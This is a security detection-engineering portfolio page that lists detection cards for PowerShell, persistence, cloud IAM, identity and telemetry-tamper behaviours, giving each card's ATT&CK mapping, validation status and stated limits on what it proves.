HawkinsOperationsDetection Engineering SOC

Detections

Detection engineering portfolio with proof boundaries attached.

This page shows the public detection-engineering surface: detection IDs, validation status, ATT&CK mapping where represented, proof ceilings, and runtime/public signal boundaries.

DETECTION_ENGINEERINGCONTROLLED_VALIDATIONRUNTIME_PUBLIC_CLAIMS_BOUNDED

Public inspection layer

source truthseparate
runtime truthseparate
signal truthseparate
evidence truthseparate
public proofseparate

Portfolio

Detection cards

Each card keeps validation, proof ceiling, and runtime/signal boundary visible so detection work cannot be over-promoted.

Endpoint / PowerShell

HO-DET-001VALIDATED

Suspicious PowerShell EncodedCommand Execution

T1059.001 · Command and Scripting Interpreter: PowerShell

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Runtime and signal claims are blocked at this ceiling. No production, customer-deployment, or autonomous-resolution claim is made.
Inspect route →

Endpoint / Persistence

HO-DET-011PRIVATE

Windows Service Creation / Binary Change

Persistence: service creation — ATT&CK mapping in source artifact

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Private runtime evidence is held privately and is blocked from public proof; no public-safe runtime claim is made and runtime/signal stay blocked.
Inspect route →

Endpoint / Persistence

HO-DET-012VALIDATED

Suspicious Scheduled Task Creation

Scheduled Task/Job: Scheduled Task — ATT&CK mapping in source artifact

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Proof record present in hawkinsoperations-proof. Runtime, signal, public-safe runtime proof, and completeness claims remain blocked at this ceiling.
Inspect route →

Cloud / IAM

AWS-DET-001FIXTURE

CloudTrail-Style IAM Denial

Cloud / IAM denial — mapping in source/proof artifacts

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Fixture-only. Live AWS and CloudTrail proof are blocked at this ceiling; no live-cloud claim is made.
Inspect route →

Identity / Access Behavior

ID-DET-001…004VALIDATED

Identity Detection Family

ATT&CK-aligned identity behavior (mapping per detection)

Validation
ID-DET-001…004 each: 10 controlled cases — 5 positive, 5 negative, 0 missed, 0 false-positive negatives
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Live IdP, production identity coverage, and completeness claims are blocked at this ceiling; no live-identity claim is made.
Inspect route →

Telemetry / Defense Evasion

HO-DET-013PLANNED

Defense Tool and Telemetry Tamper Attempt

Defense evasion / telemetry tamper — mapping in source artifact

Validation
Validation not complete.
Proof ceiling
SOURCE_EXISTS · VALIDATION_PLANNED
Runtime / signal boundary
Source exists only. Validation, runtime, and signal claims are blocked at this ceiling; no validation claim is made yet.
Inspect route →

Network / Visibility Contract

HO-NDR-001CONTRACT

Security Onion / NDR Visibility Boundary

Boundary / corroboration contract — not a coverage claim

Validation
Contract surface — no validation count.
Proof ceiling
BOUNDARY_CONTRACT_ONLY
Runtime / signal boundary
Security Onion observed proof is blocked; this defines a visibility boundary and makes no observed-signal claim.
Inspect route →

Pipeline / Telemetry Contract

HO-PIPE-001PLANNED

Cribl / Pipeline Route Integrity

Pipeline route contract — not an ATT&CK detection proof

Validation
Source exists; validation planned.
Proof ceiling
SOURCE_EXISTS · VALIDATION_PLANNED
Runtime / signal boundary
Cribl-routed proof is blocked at this ceiling; no Cribl-routed claim is made.
Inspect route →

Mapping

ATT&CK and lifecycle map

Cyber Kill Chain and ATT&CK mapping help reviewers understand lifecycle stage, detection intent, and coverage. They do not prove live telemetry, runtime deployment, signal observation, or customer use.

Reconnaissance

Boundary/source contracts plus controlled identity validation reports.

Use this stage to inspect visibility planning, identity-context validation, and gap tracking without inferring live coverage.

Strongest reviewer artifact: ID-DET validation reports and HO-NDR-001 / HO-PIPE-001 boundary contracts.

Weaponization

Defensive behavior modeling with source, validation, and proof truth separated.

Use this stage to see how behaviors become testable detection artifacts and where proof records do or do not exist.

Strongest reviewer artifact: Proof records for HO-DET-001, HO-DET-011, HO-DET-012, and AWS-DET-001 where present.

Delivery

FIXTURE_ONLY / CONTROLLED_TEST_VALIDATED.

Use this stage for cloud-access fixture review only; it does not assert a live AWS deployment.

Strongest reviewer artifact: AWS-DET-001 proof record and proof card.

Exploitation

CONTROLLED_TEST_VALIDATED.

Use this stage to trace PowerShell execution detection from ATT&CK mapping through source, validation, and proof boundary.

Strongest reviewer artifact: HO-DET-001 proof record, proof card, Proof Pack 001, and validation report.

Routes

Inspect source

Open route

Detections repo

Open source-controlled detection packages.

Inspect pathOpen route

Validation registry

Inspect fixture counts, pass states, and blocked runtime/public signal states.

Inspect pathOpen route

Proof authority

Inspect proof records, Governance Saves, and blocked claims.

Inspect path